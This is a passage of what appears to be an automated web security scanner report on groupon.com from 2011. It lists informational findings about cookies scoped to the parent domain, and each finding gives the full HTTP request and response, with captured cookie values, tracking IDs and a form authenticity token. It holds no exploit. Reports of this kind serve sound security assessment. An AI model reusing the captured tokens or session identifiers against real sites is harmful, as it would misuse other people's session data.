segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:37:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 15:36:52 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1304955432+ \"5056308203649640923\"+ 4451+ 6017+ 2]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuFYeZZVgElixZQF71gUGDVetCx8x2LAaAHmc0lwXPnMApR9OgEky6DBAJQBs7lkOC58YALKPAbLMGnc2bwUqI/J4g5U9vs3ZgFGif/P5oNN/X8cYiqYD5SdfQMk+xwq2z5/AVgWzOcS4bh3AOSiLRd+vYXYyWDBABR9BXbJs0U/UERXzGcFmjS57zSK6M77IPNnzV+LEAUAeCtQJA=="; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEue4GiHAJLFiyoJ3LAoMGgwGjBZgNpc4x/FAARaJpxMQEmA2UGK3NVDHY7gEk8UdqMQCF6DE/2fz4RLPQWwuYY71rkCJLRd+vYVIMFgwAAW3hQowSkzuO40iuNcFKDhr/lqEIAArXi/T"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

10.57. http://www.groupon.com/dallas/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /dallas/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:13 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: visited=visit_1; path=/; expires=Sun, 09-May-2021 15:38:13 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:13 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/subscriptions/new?division_p=dallas
X-Runtime: 34
Cache-Control: no-cache
Content-Length: 124
Connection: keep-alive

<html><body>You are being <a href="http://www.groupon.com/subscriptions/new?division_p=dallas">redirected</a>.</body></html>

10.58. http://www.groupon.com/learn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /learn

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 200
ETag: "0345c004e46753e8c959a4f64568fdd0"
X-Runtime: 100
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.59. http://www.groupon.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; NREUM=s=1304955365968; visited=visit_1; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.6.9.1304955489618; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:38 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:38 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:38 GMT; HttpOnly
Status: 200
ETag: "0b5465a4051743e698e7fc66860eed29"
X-Runtime: 94
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.60. http://www.groupon.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /privacy

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:45 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:44 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:45 GMT; HttpOnly
Status: 200
ETag: "674d83fb859dfa126fff53b15ed631d0"
X-Runtime: 734
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.61. http://www.groupon.com/subscriptions/new

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1 HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
Referer: http://share.meebo.com/cim/whitev4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:34 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: referred_at=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=mbe; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: adchemy_id=q4; path=/
Set-Cookie: conversion_val=; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: _tpcid=q4; domain=.groupon.com; path=/; expires=Mon, 16-May-2011 15:35:34 GMT
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:34 GMT
Set-Cookie: b=fb20b364-7a51-11e0-a127-005056926ae9; path=/; expires=Sun, 09-May-2021 15:35:34 GMT
Set-Cookie: s=fb20c0ac-7a51-11e0-a127-005056926ae9; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=5ab241eb06d51f105c0c22a038766fce; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:34 GMT; HttpOnly
Status: 200
ETag: "52f175b7121fc6cae943527725d56424"
X-S-COOKIE: fb20c0ac-7a51-11e0-a127-005056926ae9
X-B-COOKIE: fb20b364-7a51-11e0-a127-005056926ae9
X-Runtime: 80
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...

10.62. https://www.groupon.com/dallas/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /dallas/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:06 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:06 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/dallas/
X-Runtime: 11
Cache-Control: no-cache
Content-Length: 96

<html><body>You are being <a href="http://www.groupon.com/dallas/">redirected</a>.</body></html>

10.63. https://www.groupon.com/learn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /learn

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:24 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:24 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/learn
X-Runtime: 15
Cache-Control: no-cache
Content-Length: 94

<html><body>You are being <a href="http://www.groupon.com/learn">redirected</a>.</body></html>

10.64. https://www.groupon.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

10.65. https://www.groupon.com/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /mobile

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/mobile
X-Runtime: 13
Cache-Control: no-cache
Content-Length: 95

<html><body>You are being <a href="http://www.groupon.com/mobile">redirected</a>.</body></html>

10.66. https://www.groupon.com/users

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:13 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/users/new
X-Runtime: 62
Cache-Control: no-cache
Content-Length: 99

<html><body>You are being <a href="https://www.groupon.com/users/new">redirected</a>.</body></html>

10.67. https://www.groupon.com/users/new

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
